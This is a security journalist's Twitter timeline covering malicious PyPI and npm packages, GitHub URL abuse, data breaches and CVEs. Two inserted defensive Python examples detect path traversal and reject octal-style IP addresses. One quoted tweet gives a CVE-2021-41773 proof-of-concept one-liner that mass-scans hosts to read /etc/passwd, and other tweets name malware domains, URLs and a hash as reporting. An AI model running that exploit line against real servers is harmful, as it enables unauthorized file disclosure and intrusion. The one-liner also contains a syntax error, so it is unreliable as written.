Security Researcher | Tech Journalist | 📰 Bylines + seen on: BBC, BleepingComputer, Channel 5, TechCrunch | ✉️ ax@hey.ax

🇨🇦🇬🇧
A GitHub flaw lets attackers upload executables that appear to be hosted on a company's official repo, such as Microsoft's—without the repo owner knowing anything about it. The following URLs, for example, make it seem like these ZIPs are present on Microsoft's source code repo: https://github[.]com/microsoft/vcpkg/files/14125503/Cheat.Lab.2.7.2.zip https://github[.]com/microsoft/STL/files/14432565/Cheater.Pro.1.6.0.zip But they are not. These ZIPs are #malware. An attacker, while commenting on any GitHub commit/PR, can "attach" a file that gets assigned a URL slug containing the name of the repo where the comment was made. Even if the comment is never actually posted or later deleted by the attacker, the link to the file remains live! And, the repo owner (Microsoft in this case) would have no knowledge of or control over such files. Threat actors have been abusing this flaw to distribute malicious executables under the false pretense that these are coming from credible organizations' code repos.
49
1,089
4,888
792,501
A threat actor is now advising StackOverflow devs seeking debugging help to install a 'pytoileur' #Python package as a "solution" to their code troubles. 🛑DO NOT fall for this, it's a trap—the package has encoded code hidden on line 17 via whitespaces and infects Windows users with #trojan as soon as it's installed! sonatype.com/blog/pypi-crypt… #opensource #malware
17
225
1,205
186,028
EXCLUSIVE: #Okta says its GitHub source code repositories were stolen this December in a 'confidential' security notification sent to 'security contacts' that include IT managers at various organizations.
12
200
619
236,500
🚨 Apache has disclosed an *actively exploited* Path traversal flaw in the #opensource "httpd" server. Over 112,000 exposed Apache servers run version 2.4.49, and should be upgraded now! New fix checks for encoded path traversal characters e.g. /../.%2E/ blog.sonatype.com/apache-ser…
10
306
518
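The fix described in the tweet above checks for percent-encoded dot segments that an earlier normalization pass missed. As an added illustration of that class of check (this is my own example, not Apache's code), the detector below percent-decodes a request path until it is stable, then flags any path segment that decodes to `..`. The sample paths are constructed for the example; only the mixed-encoding shape matches what the tweet describes.

```python
import re
from urllib.parse import unquote

# Constructed sample request paths, e.g. as pulled from an access log (not from the tweet).
SAMPLE_PATHS = [
    "/index.html",                              # ordinary request
    "/cgi-bin/.%2e/%2e%2e/%2e%2e/etc/passwd",   # mixed literal and encoded dots
    "/icons/..%2F..%2Fetc/passwd",              # encoded slashes between plain dot-dot
    "/docs/%252e%252e/secret",                  # double-encoded: %25 -> %, then %2e -> .
    "/static/a..b/file.txt",                    # ".." inside a name is not a traversal segment
]


def fully_decode(path: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly until the string stops changing, so that
    double (or triple) encoding cannot hide a segment from the check."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def has_dot_dot_segment(path: str) -> bool:
    """True when, after full decoding, some segment of the path is exactly '..'.
    Splitting on both slash styles avoids a backslash being used to glue segments."""
    decoded = fully_decode(path)
    return any(segment == ".." for segment in re.split(r"[/\\]", decoded))


def flag_traversal(paths):
    """Return the subset of paths a defender should review as traversal attempts."""
    return [p for p in paths if has_dot_dot_segment(p)]


if __name__ == "__main__":
    for p in SAMPLE_PATHS:
        print(f"{'TRAVERSAL' if has_dot_dot_segment(p) else 'ok       '}  {p}")
```

The point of decoding before normalizing is the one the tweet makes: a check that runs on the raw string sees `.%2e` as a harmless two-character name, while the filesystem layer sees `..`. Decoding to a fixed point first closes that gap for single and double encoding alike.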
Uber won't fix the vulnerability that lets anyone email as "Uber"—this isn't a spoofed email but sent from Uber via an exposed endpoint. Researcher @0x21SAFE states threat actors could abuse this to phish 57 million victims of the 2016 Uber data breach. bleepingcomputer.com/news/se…
15
147
512
Anonymous altered the official knowledgebase of Epik after the alt-right web hosting provider denied that any breach had occurred. Epik has provided services for the Texas GOP, 8chan, Parler, and Gab, among others. arstechnica.com/information-… #EpikFail
12
133
444
EXCLUSIVE: Newly discovered #Azure flaw lets attackers brute-force Active Directory credentials in an undetected manner. At this time, there's no way to easily block the endpoints used by Seamless SSO. #Microsoft seems to consider this a "design" choice. arstechnica.com/information-…
18
294
519
GitHub calls these "anonymized URLs" but I'm not sure if that's accurate—considering they appear to be associated with a repo. By contrast, Discord CDN URLs to "attachments" are truly anonymized and look like: https://cdn.discordapp[.]com/attachments/XXXXX/XXXX/virus.exe
4
24
486
59,474
BREAKING: eFile[.]com, an IRS-authorized U.S. tax return software provider, was caught serving #JavaScript malware for weeks—as early as March 17th, and up until at least April 1st. bleepingcomputer.com/news/se… h/t @malwrhunterteam @johullrich
9
123
305
51,526
PyTorch reveals malicious dependency chain compromise between Dec 25th & 30th. The counterfeit 'tortchtrion' stole SSH keys, first 1000 files in $HOME, .gitconfig and other secrets. 2,300+ downloads seen so far on PyPI. Uninstall now 👇👇👇 bleepingcomputer.com/news/se… #opensource
4
131
267
68,016
BREAKING: #PHP Git server is the latest victim of a software supply chain attack in which attackers planted a remote code execution #backdoor in the PHP source code. PHP powers almost 8 out of 10 sites on the internet, making this upstream attack noteworthy. #opensource #git
PHP's Git server hacked to add backdoors to PHP source code - @Ax_Sharma bleepingcomputer.com/news/se…
3
174
211
CVE-2023-29218 👀 Twitter Recommendation Algorithm... allows attackers to cause a denial of service (reduction of reputation score) by arranging for multiple Twitter accounts to coordinate negative signals regarding a target account, such as unfollowing, muting, blocking,...
8
61
204
85,784
Package is part of a wider ("Cool package") campaign infiltrating Python registries like PyPI since 2023. Multiple such similar typosquatting packages contain hidden obfuscated or encoded code, designed to drop persistent Windows malware as soon as these are installed.
2
11
177
23,810
BREAKING: UN #DataBreach exposed over 100,000 employee records and travel history due to publicly accessible '.git' directories and credential files. "Threat actors likely already have the data," state researchers @Kirtaner @johnjhacking @JacksonHHax @nicksahler
United Nations data breach exposed over 100k UNEP staff records - @Ax_Sharma bleepingcomputer.com/news/se…
2
31
183
#Golang, #Rustlang "net" library is impacted by the severe IP address validation vulnerability previously found in Netmask. Over 4 million results for "import net" on GitHub. Kubernetes also cherry-picked the fix. CVE-2021-29922 & CVE-2021-29923👇👇👇 bleepingcomputer.com/news/se…
4
72
179
EXCLUSIVE: Ringleader of a massive fake news empire, 'Hacker X' comes out. Through extensive efforts, he created an untraceable webring of HUNDREDS of 'news' sites to spread conspiracy theories, propaganda to tip the 2016 US Election in Trump's favor. arstechnica.com/information-…
12
69
131
2022 starts with Y2K22 bug: Emails getting stuck in Microsoft Exchange on-prem servers... 🤯 The cause? The FIP-FS malware scanning service that uses signed 'int32' format and can't fit '2022' 🥵💣 Here's a temporary workaround until MS releases a fix
Microsoft Exchange '2022' FIP-FS bug causes emails to get stuck - @LawrenceAbrams bleepingcomputer.com/news/te…
6
60
138
🇨🇦 Canada's major banks: RBC, CIBC, Scotiabank, TD Bank, BMO all affected by a mysterious, hours-long outage. Customers report e-transfers getting auto-rejected, access issues with online and mobile banking, and being stuck at grocery store checkouts. bleepingcomputer.com/news/se…
10
62
108
An exposed #GitHub repo leaked personal info of some Adafruit users on or before 2019: * names * email addresses * street addresses * order details Real data seems to have been used for a training data set that got committed to a public repo. blog.adafruit.com/2022/03/04… #DataLeak
7
30
111
Northern Ireland has temporarily suspended its COVID "vaccine passport" certification service following a data leak—some users seeing data of other users. The incident has been reported to UK's IPO. Not all users are impacted 👇👇👇 bleepingcomputer.com/news/se… #databreach #dataleak
7
61
104
Phishing actors are targeting verified Twitter users as Twitter has been relentlessly removing blue badges from "incorrectly verified" accounts this week: bleepingcomputer.com/news/se…
2
25
97
Turns out "netmask" has had yet another bug fix made in version 2.0.1 on #npm for the critical IP address validation #vulnerability as fixes for CVE-2021-28918 were deemed incomplete. This was spotted by @ryotkak and a newer CVE-2021-29418 has now been assigned. #opensource
2
19
90
One of the largest Vietnamese crypto trading apps, ONUS suffered a #Log4J hack, followed by a $5 million extortion demand. After ONUS refused to pay the ransom, threat actors put up 2 million customer records, databases, & ID/passport images up for sale. bleepingcomputer.com/news/se…
4
31
76
More power to the crew! They let this obnoxious, self-entitled man off too easy. So wish law enforcement was called to greet the 'unruly passenger' on landing. Baffling.
2
1
63
92,535
From fake #TikTok livestreams, to Midjourney being abused to make AI art — in this in-depth investigation, @Hannah_Gelbart & I delve into all the tricks scammers are playing to exploit the ecological disaster in #Turkey and Syria to steal your donations. bbc.com/news/world-europe-64…
3
38
60
20,092
#npm malware stealing Chrome passwords with a real password recovery tool disguised as "TeamViewer.exe" was itself amusing enough. It just gets better when #malware author has a dump of their own plaintext passwords exposed🙃 Research by @ReversingLabs. #opensource #SupplyChain
2
21
60
EXCLUSIVE: A vulnerability (CVE) advisory from MITRE accidentally exposed over a dozen vulnerable systems—since at least April 2022. bleepingcomputer.com/news/se…
4
14
60
HaveIBeenPwned is alerting over 15 million users, including non-Epik customers who are impacted by the data breach. Epik's multi-gig dump leaked by Anonymous also includes a 16 GB SQL database of scraped WHOIS records. arstechnica.com/information-… #EpikFail #databreach
1
27
38
Researcher refuses Telegram’s #BugBounty reward over the terms of agreement, and discloses the flaw with "self-destruct" feature that took months to resolve. arstechnica.com/information-…
1
4
46
"Upon investigation, we have concluded that such access was used to copy Okta code repositories," writes David Bradbury, the company's Chief Security Officer (CSO) in the email. bleepingcomputer.com/news/se…
1
11
37
12,499
Kubernetes 1.24 coming out later today will be the first release to officially use #Sigstore—enabling seamless signature verification to protect against supply chain attacks across the 5.6M developer community, explains @lorenc_dan of @chainguard_dev blog.sigstore.dev/kubernetes…
15
45
Another neat GitHub trick. The following URL makes it look like both the commit and the .txt file are from the google/leveldb repo—but they are not: https://raw.githubusercontent[.]com/google/leveldb/2286a0cedd18b65255e7e54dc18630972420b7d6/test-file.txt
2
9
42
6,673
BREAKING: Atlassian is asking enterprise Jira Data Center customers to patch this critical #RCE. Deserialization #vulnerability stems from unrestricted access to ports 40001 and 40011 in an Ehcache RMI network service, that remote attackers can exploit. bleepingcomputer.com/news/se…
2
19
38
Russia-based dev Yaffle altered 'event-source-polyfill' #npm package in March to show anti-war messages to Russians, as a peaceful protest. This marks the THIRD major #opensource self-sabotage of 2022: npm package is downloaded 600K weekly and used by 135,000+ GitHub repos.
3
19
37
1. 35k code hits, not repos. 2. 13k of these results are from just one (relatively unimportant) repo. 3. Rest of the repos are clones of projects, not original projects hijacked. Impact is far smaller than what is hyped here. Granted, still a spammy mess for GitHub to clean up.
2
17
37
Gmail just went down. #GmailDown
5
6
34
31,506
⚠️ Just because a library name itself contains a higher version number doesn't mean it's the newer or legit version of an official lib. 'colors-2.0', colors-3.0'... that keep surfacing on #npm have nothing to do with 'colors' but pack malware blog.sonatype.com/remember-n… #Opensource
4
16
38
Too much chatter about an *unconfirmed* RCE in Spring Core — based on 1 minor commit that deprecates Java deserialization in one of the classes. Spring Core dev @Sam_Brannen confirms this is NOT a flaw, but a mere warning to anyone practicing untrusted deserialization.
2
14
35
BREAKING: Turns out Python 3.x standard library "ipaddress" also has the octal IP address parsing #vulnerability that had previously impacted "netmask". Introduced due to a 2019 regression bug. Credit: @sickcodes @koroeskohr @johnjhacking @kaoudis @tensor_bodega, et al #opensource
Python also impacted by critical IP address validation vulnerability - @Ax_Sharma bleepingcomputer.com/news/se…
1
16
35
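The netmask, Go/Rust "net" and Python "ipaddress" bugs in the tweets above share one root cause: a leading zero in a dotted-quad octet is read as decimal by the validator but as octal by the OS, so the two disagree about which host an address names. The example below is mine, not code from any of those projects: it emulates the classic BSD inet_aton reading alongside the naive decimal reading, and shows a strict parser that simply refuses ambiguous input. The sample addresses are constructed; `0177.0.0.1` is the textbook case where a decimal reader sees a public-looking 177.0.0.1 while the OS connects to loopback.

```python
import ipaddress

# Constructed sample inputs (not taken from the tweet).
SAMPLES = ["0177.0.0.1", "010.8.8.8", "127.0.0.1", "1.2.3.04"]


def _split_quad(text: str):
    parts = text.split(".")
    if len(parts) != 4 or not all(parts):
        raise ValueError(f"not a dotted quad: {text!r}")
    return parts


def _to_address(octets):
    if any(not 0 <= o <= 255 for o in octets):
        raise ValueError(f"octet out of range: {octets}")
    return str(ipaddress.IPv4Address(bytes(octets)))


def legacy_octet(part: str) -> int:
    """Emulate the classic inet_aton convention: 0x prefix is hex,
    a leading zero means octal, anything else is decimal."""
    if part.lower().startswith("0x"):
        return int(part[2:], 16)
    if len(part) > 1 and part.startswith("0"):
        return int(part, 8)
    return int(part, 10)


def legacy_parse(text: str) -> str:
    """What the operating system resolver will actually connect to."""
    return _to_address([legacy_octet(p) for p in _split_quad(text)])


def decimal_parse(text: str) -> str:
    """What the vulnerable validators believed the string meant:
    every octet read as plain decimal, leading zeros ignored."""
    return _to_address([int(p, 10) for p in _split_quad(text)])


def strict_parse(text: str) -> str:
    """Hardened form: reject any octet that is not canonical decimal.
    Leading zeros, hex and non-digits never reach the address parser,
    so the decimal and OS readings can no longer diverge."""
    for part in _split_quad(text):
        if not part.isdigit():
            raise ValueError(f"non-decimal octet {part!r} in {text!r}")
        if len(part) > 1 and part[0] == "0":
            raise ValueError(f"ambiguous leading zero in {part!r} of {text!r}")
    return _to_address([int(p, 10) for p in _split_quad(text)])


def classify(text: str) -> dict:
    """Side-by-side view: decimal reading, OS reading, and whether strict parsing accepts it."""
    try:
        strict = strict_parse(text)
    except ValueError:
        strict = None
    return {"decimal": decimal_parse(text), "legacy": legacy_parse(text), "strict": strict}


def ambiguous_samples():
    """Inputs where a decimal validator and the OS would name different hosts."""
    return [s for s in SAMPLES if decimal_parse(s) != legacy_parse(s)]


if __name__ == "__main__":
    for s in SAMPLES:
        print(s, classify(s))
```

Note that `1.2.3.04` is rejected by the strict parser even though both readings agree on it: the safe rule is to refuse any non-canonical form rather than to reason about which particular forms happen to be harmless.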
Replying to @Ax_Sharma @0x21SAFE
Apparently, not the first time either that this was reported... nitter.app/ShivaSMaharaj/status/1… nitter.app/wld_basha/status/14776…
hey mate! i reported same vulnerability back in march 2021 and they closed it as informative and didn't start crying like a baby
1
4
33
In her book "Manipulated," former White House CIO @TrackerPayton describes 'Hacker X' in detail, but it is the first time he's being publicly named. amazon.com/dp/B084SQXNXS?btk… Special thanks to @packmatt73, Theresa Payton, and many sources who helped fact-check the story.
3
9
24
NEW: Heavily obfuscated #Python #malware caught on #opensource PyPI repo. It pulls now-deleted GitHub scripts to mine cryptocurrency on your computer. Although deleted, some of the Bash scripts could be recovered after some searching: blog.sonatype.com/sonatype-c… via @sonatype
24
32
Reddit users spotted the issue as early as March 17th when they noticed an SSL error message thrown by eFile[.]com which appeared to be fake.
1
5
31
9,821
💩 Sh*t gifting website ShitExpress hacked exposing customer email addresses, orders, and HYSTERICAL personalized messages customers had sent with their "gifts." The hacker posted the #dataleak on a forum: bleepingcomputer.com/news/se…
12
31
Python package 'onyxproxy' is an info-stealer using Unicode homoglyphs to evade detection. A real-world example of Trojan Source attack vector used in #opensource malware. Discovery by @Phylum_IO bleepingcomputer.com/news/se… Reporting by @BillToulas
14
32
4,473
RubyInstaller[.]org's Wikis poisoned since Nov 29th, 2022 with links to malware and IP tracing/logging site, IPlogger. Malware ZIP: e811cea654c10c0efe2618bf9d20e60c15497e8207cf5d8096aa75bab1e28573 #opensource
2
13
31
7,389
Why a #Doge in place of Twitter logo? 🤦‍♂️🤦‍♂️🤦‍♂️🤦‍♂️🤦‍♂️
6
3
30
5,718
BREAKING: Researcher @alxbrsn hacked Microsoft, Apple, Tesla, Uber, Netflix, more in a novel #opensource software supply chain attack via dependency hijacking. But @sonatype's automated #malware detection system has been a step ahead, learn how: blog.sonatype.com/dependency…
3
20
28
Kinda cool. npm package 'speedy-ts-compiler' downloads another package which is empty... but the code simultaneously and elegantly obtains your username via 'npm get cache' and exfiltrates it. PoC research by @Ajay_Kulal blog.sonatype.com/distractio… #OpenSource
8
29
His team created several Facebook groups appealing to the Trump voter base where these "news" articles were shared, boosting the sites' 3 million monthly readership to 30 million. Articles generated by 'Hacker X' were retweeted by prominent personalities and unwary voters alike.
1
7
21
Over 21,000 U.S. driver licenses are up for sale on a hacker forum, along with credit reports. Forum post spotted by @UnderTheBreach. The seller says they have managed to charge $400 for every 10k copies. securityreport.com/21000-u-s… #databreach
2
9
22
New "Stark for Chrome" extension allows developers to bake accessibility into products and bridge the #disability divide. Extension: chrome.google.com/webstore/d… More info: getstark.co/blog/hello-world
3
4
28
The '2FA Authenticator' Android app with 10,000+ installs on Google Play did provide real MFA functionality but... ran a hidden 'UpdateService' to download a malicious APK from domain: ⚠️ privacyandroidapp[.]club
1
8
22
PoC exploit now out for Azure Active Directory brute forcing flaw. Microsoft maintains it's not a vulnerability but appears to be working on a solution. Includes additional commentary from @DrAzureAD @Secureworks. 👇👇👇 arstechnica.com/information-…
1
8
28
#GitHub Actions abused to run #CryptoMining #malware automatically on #GitHub servers. * Needs no action from the project maintainer * Seen targeting at least 95 #opensource repos * Runs mislabeled "npm.exe" with attacker's wallet address Discovered by @JustinPerdok
GitHub Actions is being abused to mine cryptocurrency on GitHub servers in an automated attack. Attack requires no action by the targeted project that is forked. Cryptominer executes as soon as the Pull Request is filed. - @Ax_Sharma bleepingcomputer.com/news/se…
1
16
24
Popular hacking mag Hacker Noon resolves stored XSS #security #vulnerability which could let clever hackers steal user data via SVG profile avatars. An AxDB Exclusive: medium.com/axdb/stored-cross… #cybersecurity #infosec #javascript #privacy #hacking #xss #security #hackernoon
30
29
"Tracked as CVE-2021-41773, the vulnerability is the result of an incomplete path normalization logic implemented in the Apache HTTP server 2.4.49 that in turn introduced a vulnerability."
1
1
26
BREAKING: A major #BGP leak last night impacted over 20,000 ASNs/networks around the world. According to @kentikinc, some U.S. companies were also affected. bleepingcomputer.com/news/se… Analysis by @DougMadory @anurag_bhatia #outage #networksecurity #securitynews #infosec
1
15
25
⚠️ Dish Network 📡 OUTAGE: Websites and Dish Anywhere app down for days with no explanation. Employees seem to be clueless too. theverge.com/2023/2/24/23613… cc @DISHNews @Dish
8
14
26
19,472
"Why aren’t we sending an email to every user? We evaluated the risk and consulted with our privacy lawyers and legal experts, and took the approach that... mitigated any issues while being open and transparent and did not believe emailing directly was helpful in this case."
4
1
24
BTW, "are" is a legitimate PyPI package from @andreilapets -- the researchers meant "aryi" (now removed). Luckily, caught this while writing my report.
8 malicious PyPI packages w/ 30,000 downloads found by @jfrog can: * Steal credit card numbers stored in web browsers * Steal Discord tokens and sensitive info * Perform recon. (gather screenshots/files and upload em to Discord webhook) bleepingcomputer.com/news/se… #Python #malware
11
22
The tainted 'popper.js' file, loaded on almost every eFile[.]com page, contains a base64-encoded one-liner further loading malicious JS from another domain:
1
2
22
2,553
Popular GitHub project 'qr.js' used by QR code apps got hit with a "repo hijack." Although NPM version of 'qr.js' is safe for now, devs including a Facebook engineer are seeking #opensource alternatives to this heavily used #JavaScript QR code encoder. blog.sonatype.com/researcher…
11
23
Despite stealing Okta's source code, attackers did not gain unauthorized access to the Okta service or customer data, says the company. "HIPAA, FedRAMP or DoD customers" remain unaffected and no customer action is needed.
2
2
22
8,323
...And it gets a PoC
CVE-2021-41773 POC 🔥👇 ✅ One Liner : cat targets.txt | while read host do ; do curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" | grep "root:*" && echo "$host \033[0;31mVulnerable\n" || echo "$host \033[0;32mNot Vulnerable\n";done
1
24
Community does not seem pleased🍿🔥 github.com/RIAEvangelist/nod…
3
1
25
And, they were right. The 'update.js' file eventually loaded by the malicious code contains base64 string which is HTML code with this very SSL error message, as analyzed by @BleepinComputer.
1
2
22
2,293
Dark web marketplace CanadianHQ 🇨🇦 shut down by CRTC. The site's patrons traded illicit goods and services including stolen credit card numbers, and illegal drugs. Images via @DarkDotFail
3
13
21
Malicious PyMafka package drops Cobalt Strike on Windows, macOS and appears to typosquat #opensource PyKafka, Apache Kafka client for Python. blog.sonatype.com/new-pymafk… #malware
1
15
23
🍿 Severity of CVE-2022-22963—SpEL Injection in Spring Cloud Function was bumped up from a Medium to CRITICAL just now 👀 h/t @wayfaring_life tanzu.vmware.com/security/cv… cc @LawrenceAbrams @wdormann
3
17
24
Although this may have started out as a peaceful "non-destructive" protest by the developer with 'peacenotwar' module, the addition of blatantly destructive payload to 'node-ipc' raised serious concerns in the community ⚠️ given the dev also maintains ~40 popular npm packages.
1
2
21
The malicious JavaScript file 'update.js', further attempts to prompt users to download next stage payload, depending on whether they are using Chrome [update.exe] or Firefox [installer.exe].
1
4
18
4,155
And, it gets worse. PoC exploits for CVE-2021-41773 reveal it can evolve into full-on Remote Code Execution (RCE) on both Linux and Windows servers. h/t @hackerfantastic @wdormann @timb_machine
Actively exploited Apache 0-day also allows remote code execution - @Ax_Sharma bleepingcomputer.com/news/se…
3
13
21
8 malicious PyPI packages w/ 30,000 downloads found by @jfrog can: * Steal credit card numbers stored in web browsers * Steal Discord tokens and sensitive info * Perform recon. (gather screenshots/files and upload em to Discord webhook) bleepingcomputer.com/news/se… #Python #malware
9
20
Throwback Monday 😃
20
Newer versions 11.0.0 and above released for 'node-ipc' STILL continue to contain the 'peacenotwar' module that will generate text files propounding "peace" message on the Desktops of infected users:
2
1
19
PSA: CVE-2022-31289 is *NOT* a vulnerability or even a bug. The writeup on it was rushed without following any responsible disclosure and after half-baked "research."
blog.sonatype.com/nexus-repo… @pmmali_ @HackerGautam @shifacyclewala here's the opportunity to set the record straight on your blog and reports.
1
7
18
By all means, call @ubuntu @Microsoft out but why publicly name the representative? Are they even aware you leaked a private msg naming them?
8
16
In addition to using drive-by downloads and trojanized 'browser updates' to spread itself, #LummaC2 crypto-stealer now targets Python developers by imitating popular cryptocurrency libraries like 'crytic-compile'. The illicit package 'crytic-compilers' drops Lumma ⚠️ sonatype.com/blog/crytic-com…
1
1
19
1,990
Clop #ransomware just removed @AxisBank, India's third largest private bank roughly two days after I'd reached out to Axis.
3
8
18
7,125
PyPI #malware 'botaa3' - a poor typosquatting attempt at mimicking Amazon AWS SDK for Python 'boto3'. Has XOR-encrypted code to: * Exfil. data * Give attacker C2 capabilities: upload, download, browse, delete,... * Kill itself blog.sonatype.com/another-da… on @sonatype #opensource
4
18
'secretslib' PyPI package drops fileless malware to evade detection. Malicious payload injected in memory is a Monero cryptominer. Threat actor even used 'Author' info of an engineer working for a U.S. Department of Energy-funded national lab. blog.sonatype.com/pypi-packa… #opensource
1
2
20
Just had another (verified) Dish Network employee reach out to me confirming on background that the company has indeed been "cyber attacked." The employee received a written note from their manager stating, "it was caused by an outside bad actor, a known threat."
4
11
18
22,439
and @breakaway71 No author, but regret looking into this. 😖 for public service, I must advise, do not click. web.archive.org/web/20200904…
12
1
15
Proofpoint's @sherrod_im warns of over 2.8 million instances of scammers soliciting donations via fraudulent crypto wallet addresses.
1
2
13
Too early to conclude that an incident indeed at TELUS or rule out third-party vendor breach. Employee names do check out though and correspond to present-day technical staff, like devs.
2
4
16
3,481